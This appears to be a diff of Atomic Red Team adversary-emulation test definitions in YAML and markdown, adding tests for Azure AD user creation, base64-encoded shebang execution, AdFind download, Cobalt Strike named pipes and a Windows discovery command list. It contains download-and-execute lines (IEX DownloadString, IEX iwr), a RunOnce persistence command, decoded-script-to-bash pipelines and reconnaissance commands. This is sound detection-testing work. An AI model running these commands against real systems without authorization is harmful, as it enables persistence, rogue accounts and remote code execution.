+##### Get Prereq Commands:
+```powershell
+echo "Update the input arguments in the .yaml file so that the userprincipalname value is accurate for your environment"
+```
+
+
+
+
 <br/>
@@ -26,3 +26,79 @@ atomic_tests:
      aws iam delete-user --user-name #{username}
    name: sh
    elevation_required: false
+- name: Azure AD - Create a new user
+  auto_generated_guid: e62d23ef-3153-4837-8625-fa4a3829134d
+  description: Creates a new user in Azure AD. Upon successful creation, a new user will be created. Adversaries create new users so that their malicious activity does not interrupt the normal functions of the compromised users and can remain undetected for a long time.
+  supported_platforms:
+  - azure-ad
+  input_arguments:
+    username:
+      description: Display name of the new user to be created in Azure AD
+      type: string
+      default: "atomicredteam"
+    userprincipalname:
+      description: User principal name (UPN) for the new Azure user being created format email address
+      type: String
+      default: "atomicredteam@yourdomain.com"
+    password:
+      description: Password for the new Azure AD user being created
+      type: string
+      default: "reallylongcredential12345ART-ydsfghsdgfhsdgfhgsdhfg"
+  dependency_executor_name: powershell
+  dependencies:
+  - description: Check if AzureAD PowerShell module is installed
+    prereq_command: Get-InstalledModule -Name AzureAD
+    get_prereq_command: echo "use the following to install AzureAD PowerShell module - Install-Module -Name AzureAD -Scope CurrentUser -Repository PSGallery -Force"
+  - description: Check if AzureAD PowerShell module is installed
+    prereq_command: Update the input arguments so the userprincipalname value is accurate for your environment
+    get_prereq_command: echo "Update the input arguments in the .yaml file so that the userprincipalname value is accurate for your environment"
+  executor:
+    command: |-
+      Connect-AzureAD
+      $userprincipalname = "#{userprincipalname}"
+      $username = "#{username}"      
+      $password = "#{password}"
+      $PasswordProfile = New-Object -TypeName Microsoft.Open.AzureAD.Model.PasswordProfile
+      $PasswordProfile.Password = $password
+      New-AzureADUser -DisplayName $username -PasswordProfile $PasswordProfile -UserPrincipalName $userprincipalname -AccountEnabled $true -MailNickName $username      
+    cleanup_command: Remove-AzureADUser -ObjectId "#{userprincipalname}"
+    name: powershell
+- name: Azure AD - Create a new user via Azure CLI
+  auto_generated_guid: 228c7498-be31-48e9-83b7-9cb906504ec8
+  description: Creates a new user in Azure AD via the Azure CLI. Upon successful creation, a new user will be created. Adversaries create new users so that their malicious activity does not interrupt the normal functions of the compromised users and can remain undetected for a long time.
+  supported_platforms:
+  - azure-ad
+  input_arguments:
+    username:
+      description: Display name of the new user to be created in Azure AD
+      type: string
+      default: "atomicredteam"
+    userprincipalname:
+      description: User principal name (UPN) for the new Azure user being created format email address
+      type: String
+      default: "atomicredteam@yourdomain.com"
+    password:
+      description: Password for the new Azure AD user being created
+      type: string
+      default: "reallylongcredential12345ART-ydsfghsdgfhsdgfhgsdhfg"
+  dependency_executor_name: powershell
+  dependencies:
+  - description: Check if Azure CLI is installed and install manually
+    prereq_command: az account list
+    get_prereq_command: echo "use the following to install the Azure CLI manually https://aka.ms/installazurecliwindows"
+  - description: Check if Azure CLI is installed and install via PowerShell
+    prereq_command: az account list
+    get_prereq_command: echo "use the following to install the Azure CLI $ProgressPreference = 'SilentlyContinue'; Invoke-WebRequest -Uri https://aka.ms/installazurecliwindows -OutFile .\AzureCLI.msi; Start-Process msiexec.exe -Wait -ArgumentList '/I AzureCLI.msi /quiet'; Remove-Item .\AzureCLI.msi"
+  - description: Update the userprincipalname to meet your requirements  
+    prereq_command: Update the input arguments so the userprincipalname value is accurate for your environment
+    get_prereq_command: echo "Update the input arguments in the .yaml file so that the userprincipalname value is accurate for your environment"
+  executor:
+    command: |-
+      az login
+      $userprincipalname = "#{userprincipalname}"
+      $username = "#{username}"      
+      $password = "#{password}"
+      az ad user create --display-name $username --password $password --user-principal-name $userprincipalname
+      az ad user list --filter "displayname eq 'atomicredteam'"     
+    cleanup_command: az ad user delete --id #{userprincipalname}
+    name: powershell
@@ -20,6 +20,8 @@ Sometimes a user's action may be required to open it for deobfuscation or decryp

 - [Atomic Test #6 - Hex decoding with shell utilities](#atomic-test-6---hex-decoding-with-shell-utilities)

+- [Atomic Test #7 - Linux Base64 Encoded Shebang in CLI](#atomic-test-7---linux-base64-encoded-shebang-in-cli)
+

 <br/>

@@ -297,4 +299,55 @@ echo "Please install xxd"



+<br/>
+<br/>
+
+## Atomic Test #7 - Linux Base64 Encoded Shebang in CLI
+Using Linux Base64 Encoded shell scripts that have Shebang in them. This is commonly how attackers obfuscate passing and executing a shell script. Seen [here](https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html) by TrendMicro, as well as [LinPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS). Also a there is a great Sigma rule [here](https://github.com/SigmaHQ/sigma/blob/master/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml) for it.
+
+**Supported Platforms:** Linux, macOS
+
+
+**auto_generated_guid:** 3a15c372-67c1-4430-ac8e-ec06d641ce4d
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| bash_encoded | Encoded | string | IyEvYmluL2Jhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo=|
+| dash_encoded | Encoded | string | IyEvYmluL2Rhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo=|
+| fish_encoded | Encoded | string | IyEvYmluL2Rhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo=|
+| sh_encoded | Encoded | string | IyEvYmluL3NoCmVjaG8gImh0dHBzOi8vd3d3LnlvdXR1YmUuY29tL0BhdG9taWNzb25hZnJpZGF5IEZUVyIK|
+
+
+#### Attack Commands: Run with `sh`! 
+
+
+```sh
+echo #{bash_encoded} | base64 -d | bash
+echo #{dash_encoded} | base64 -d | bash
+echo #{fish_encoded} | base64 -d | bash
+echo #{sh_encoded} | base64 -d | bash
+```
+
+
+
+
+#### Dependencies:  Run with `sh`!
+##### Description: base64 must be present
+##### Check Prereq Commands:
+```sh
+which base64
+```
+##### Get Prereq Commands:
+```sh
+echo "please install base64"
+```
+
+
+
+
 <br/>
@@ -171,3 +171,43 @@ atomic_tests:
      echo $ENCODED > #{encoded_file} && xxd -r -p < #{encoded_file}
      echo $ENCODED > #{encoded_file} && cat #{encoded_file} | xxd -r -p
      echo $ENCODED > #{encoded_file} && cat < #{encoded_file} | xxd -r -p
+- name: Linux Base64 Encoded Shebang in CLI
+  auto_generated_guid: 3a15c372-67c1-4430-ac8e-ec06d641ce4d
+  description: |
+    Using Linux Base64 Encoded shell scripts that have Shebang in them. This is commonly how attackers obfuscate passing and executing a shell script. Seen [here](https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html) by TrendMicro, as well as [LinPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS). Also a there is a great Sigma rule [here](https://github.com/SigmaHQ/sigma/blob/master/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml) for it. 
+  supported_platforms:
+  - linux
+  - macos
+  input_arguments:
+    bash_encoded:
+      description: Encoded #!/bin/bash script
+      type: string
+      default: IyEvYmluL2Jhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo=
+    dash_encoded:
+      description: Encoded #!/bin/dash script
+      type: string
+      default: IyEvYmluL2Rhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo=
+    fish_encoded:
+      description: Encoded #!/bin/fish script
+      type: string
+      default: IyEvYmluL2Rhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo=
+    sh_encoded:
+      description: Encoded #!/bin/sh script
+      type: string
+      default: IyEvYmluL3NoCmVjaG8gImh0dHBzOi8vd3d3LnlvdXR1YmUuY29tL0BhdG9taWNzb25hZnJpZGF5IEZUVyIK
+  dependencies:
+  - description: |
+      base64 must be present
+    prereq_command: |
+      which base64
+    get_prereq_command: |
+      echo "please install base64"
+  executor:
+    name: sh
+    elevation_required: false
+    command: |
+      echo #{bash_encoded} | base64 -d | bash
+      echo #{dash_encoded} | base64 -d | bash
+      echo #{fish_encoded} | base64 -d | bash
+      echo #{sh_encoded} | base64 -d | bash
+      
@@ -187,6 +187,7 @@ if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
+New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
 Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
 ```

@@ -233,6 +234,7 @@ if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
+New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
 Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
 ```

@@ -81,6 +81,7 @@ atomic_tests:
    prereq_command: |
      if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
    get_prereq_command: |
+      New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
      Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
  executor:
    command: |
@@ -105,6 +106,7 @@ atomic_tests:
    prereq_command: |
      if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
    get_prereq_command: |
+      New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
      Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
  executor:
    command: |
@@ -180,7 +180,7 @@ Upon successful execution, a new entry will be added to the runonce item in the

 ```powershell
 $RunOnceKey = "#{reg_key_path}"
-set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/36f83b728bc26a49eacb0535edc42be8c377ac54/ARTifacts/Misc/Discovery.bat`")"'
+set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1547.001/src/Discovery.bat`")"'
 ```

 #### Cleanup Commands:
@@ -273,7 +273,8 @@ Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsesta
 <br/>

 ## Atomic Test #6 - Suspicious bat file run from startup Folder
-bat files can be placed in and executed from the startup folder to maintain persistance.
+bat files can be placed in and executed from the startup folder to maintain persistance
+
 Upon execution, cmd will be run and immediately closed. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
 folder and will also run when the computer is restarted and the user logs in.

@@ -59,7 +59,7 @@ atomic_tests:
  executor:
    command: |
      $RunOnceKey = "#{reg_key_path}"
-      set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/36f83b728bc26a49eacb0535edc42be8c377ac54/ARTifacts/Misc/Discovery.bat`")"'
+      set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1547.001/src/Discovery.bat`")"'
    cleanup_command: |
      Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun" -Force -ErrorAction Ignore
    name: powershell
@@ -106,7 +106,8 @@ atomic_tests:
 - name: Suspicious bat file run from startup Folder
  auto_generated_guid: 5b6768e4-44d2-44f0-89da-a01d1430fd5e
  description: |
-    bat files can be placed in and executed from the startup folder to maintain persistance.
+    bat files can be placed in and executed from the startup folder to maintain persistance
+    
    Upon execution, cmd will be run and immediately closed. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
    folder and will also run when the computer is restarted and the user logs in.
  supported_platforms:
@@ -0,0 +1,44 @@
+net user Administrator /domain
+net Accounts
+net localgroup administrators
+net use
+net share
+net group "domain admins" /domain
+net config workstation
+net accounts
+net accounts /domain
+net view
+sc.exe query
+reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"
+reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
+reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
+reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
+reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices
+reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify
+reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
+reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell
+reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell
+reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad
+reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
+reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
+reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
+reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
+reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
+reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
+reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
+wmic useraccount list
+wmic useraccount get /ALL
+wmic startup list brief
+wmic share list
+wmic service get name,displayname,pathname,startmode
+wmic process list brief
+wmic process get caption,executablepath,commandline
+wmic qfe get description,installedOn /format:csv
+arp -a
+whoami
+ipconfig /displaydns
+route print
+netsh advfirewall show allprofiles
+systeminfo
+qwinsta
+quser
@@ -0,0 +1,244 @@
+# T1559 - Inter-Process Communication
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1559)
+<blockquote>Adversaries may abuse inter-process communication (IPC) mechanisms for local code or command execution. IPC is typically used by processes to share data, communicate with each other, or synchronize execution. IPC is also commonly used to avoid situations such as deadlocks, which occurs when processes are stuck in a cyclic waiting pattern. 
+
+Adversaries may abuse IPC to execute arbitrary code or commands. IPC mechanisms may differ depending on OS, but typically exists in a form accessible through programming languages/libraries or native interfaces such as Windows [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1559/002) or [Component Object Model](https://attack.mitre.org/techniques/T1559/001). Linux environments support several different IPC mechanisms, two of which being sockets and pipes.(Citation: Linux IPC) Higher level execution mediums, such as those of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s, may also leverage underlying IPC mechanisms. Adversaries may also use [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) to facilitate remote IPC execution.(Citation: Fireeye Hunting COM June 2019)</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Cobalt Strike Artifact Kit pipe](#atomic-test-1---cobalt-strike-artifact-kit-pipe)
+
+- [Atomic Test #2 - Cobalt Strike Lateral Movement (psexec_psh) pipe](#atomic-test-2---cobalt-strike-lateral-movement-psexec_psh-pipe)
+
+- [Atomic Test #3 - Cobalt Strike SSH (postex_ssh) pipe](#atomic-test-3---cobalt-strike-ssh-postex_ssh-pipe)
+
+- [Atomic Test #4 - Cobalt Strike post-exploitation pipe (4.2 and later)](#atomic-test-4---cobalt-strike-post-exploitation-pipe-42-and-later)
+
+- [Atomic Test #5 - Cobalt Strike post-exploitation pipe (before 4.2)](#atomic-test-5---cobalt-strike-post-exploitation-pipe-before-42)
+
+
+<br/>
+
+## Atomic Test #1 - Cobalt Strike Artifact Kit pipe
+Uses the [Named Pipes Micro Emulation](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/micro_emulation_plans/src/named_pipes) executable from the Center for Threat Informed Defense to create a named pipe for inter-process communication.
+
+The named pipe executable will pause for 30 seconds to allow the client and server to exchange a message through the pipe.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** bd13b9fc-b758-496a-b81a-397462f82c72
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+"PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe 1
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Named pipe executors must exist on disk
+##### Check Prereq Commands:
+```powershell
+if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe)) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
+$zipUrl  = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip"
+Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin"
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #2 - Cobalt Strike Lateral Movement (psexec_psh) pipe
+Uses the [Named Pipes Micro Emulation](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/micro_emulation_plans/src/named_pipes) executable from the Center for Threat Informed Defense to create a named pipe for inter-process communication.
+
+The named pipe executable will pause for 30 seconds to allow the client and server to exchange a message through the pipe.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 830c8b6c-7a70-4f40-b975-8bbe74558acd
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+"PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe 2
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Named pipe executors must exist on disk
+##### Check Prereq Commands:
+```powershell
+if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe)) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
+$zipUrl  = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip"
+Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin"
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #3 - Cobalt Strike SSH (postex_ssh) pipe
+Uses the [Named Pipes Micro Emulation](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/micro_emulation_plans/src/named_pipes) executable from the Center for Threat Informed Defense to create a named pipe for inter-process communication.
+
+The named pipe executable will pause for 30 seconds to allow the client and server to exchange a message through the pipe.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** d1f72fa0-5bc2-4b4b-bd1e-43b6e8cfb2e6
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+"PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe 3
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Named pipe executors must exist on disk
+##### Check Prereq Commands:
+```powershell
+if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe)) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
+$zipUrl  = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip"
+Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin"
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #4 - Cobalt Strike post-exploitation pipe (4.2 and later)
+Uses the [Named Pipes Micro Emulation](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/micro_emulation_plans/src/named_pipes) executable from the Center for Threat Informed Defense to create a named pipe for inter-process communication.
+
+The named pipe executable will pause for 30 seconds to allow the client and server to exchange a message through the pipe.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 7a48f482-246f-4aeb-9837-21c271ebf244
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+"PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe 4
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Named pipe executors must exist on disk
+##### Check Prereq Commands:
+```powershell
+if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe)) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
+$zipUrl  = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip"
+Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin"
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #5 - Cobalt Strike post-exploitation pipe (before 4.2)
+Uses the [Named Pipes Micro Emulation](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/micro_emulation_plans/src/named_pipes) executable from the Center for Threat Informed Defense to create a named pipe for inter-process communication.
+
+The named pipe executable will pause for 30 seconds to allow the client and server to exchange a message through the pipe.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 8dbfc15c-527b-4ab0-a272-019f469d367f
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+"PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe 5
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Named pipe executors must exist on disk
+##### Check Prereq Commands:
+```powershell
+if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe)) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
+$zipUrl  = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip"
+Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin"
+```
+
+
+
+
+<br/>
@@ -0,0 +1,123 @@
+attack_technique: T1559
+display_name: Inter-Process Communication
+atomic_tests:
+
+- name: Cobalt Strike Artifact Kit pipe
+  auto_generated_guid: bd13b9fc-b758-496a-b81a-397462f82c72
+  description: |
+    Uses the [Named Pipes Micro Emulation](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/micro_emulation_plans/src/named_pipes) executable from the Center for Threat Informed Defense to create a named pipe for inter-process communication.
+    
+    The named pipe executable will pause for 30 seconds to allow the client and server to exchange a message through the pipe.
+  supported_platforms:
+  - windows
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      Named pipe executors must exist on disk
+    prereq_command: |
+      if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe)) {exit 0} else {exit 1}
+    get_prereq_command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
+      $zipUrl  = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip"
+      Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin"
+  executor:
+    command: |
+      "PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe 1
+    name: command_prompt
+    
+- name: Cobalt Strike Lateral Movement (psexec_psh) pipe
+  auto_generated_guid: 830c8b6c-7a70-4f40-b975-8bbe74558acd
+  description: |
+    Uses the [Named Pipes Micro Emulation](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/micro_emulation_plans/src/named_pipes) executable from the Center for Threat Informed Defense to create a named pipe for inter-process communication.
+    
+    The named pipe executable will pause for 30 seconds to allow the client and server to exchange a message through the pipe.
+  supported_platforms:
+  - windows
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      Named pipe executors must exist on disk
+    prereq_command: |
+      if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe)) {exit 0} else {exit 1}
+    get_prereq_command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
+      $zipUrl  = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip"
+      Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin"
+  executor:
+    command: |
+      "PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe 2
+    name: command_prompt
+    
+- name: Cobalt Strike SSH (postex_ssh) pipe
+  auto_generated_guid: d1f72fa0-5bc2-4b4b-bd1e-43b6e8cfb2e6
+  description: |
+    Uses the [Named Pipes Micro Emulation](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/micro_emulation_plans/src/named_pipes) executable from the Center for Threat Informed Defense to create a named pipe for inter-process communication.
+    
+    The named pipe executable will pause for 30 seconds to allow the client and server to exchange a message through the pipe.
+  supported_platforms:
+  - windows
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      Named pipe executors must exist on disk
+    prereq_command: |
+      if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe)) {exit 0} else {exit 1}
+    get_prereq_command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
+      $zipUrl  = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip"
+      Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin"
+  executor:
+    command: |
+      "PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe 3
+    name: command_prompt
+
+- name: Cobalt Strike post-exploitation pipe (4.2 and later)
+  auto_generated_guid: 7a48f482-246f-4aeb-9837-21c271ebf244
+  description: |
+    Uses the [Named Pipes Micro Emulation](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/micro_emulation_plans/src/named_pipes) executable from the Center for Threat Informed Defense to create a named pipe for inter-process communication.
+    
+    The named pipe executable will pause for 30 seconds to allow the client and server to exchange a message through the pipe.
+  supported_platforms:
+  - windows
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      Named pipe executors must exist on disk
+    prereq_command: |
+      if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe)) {exit 0} else {exit 1}
+    get_prereq_command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
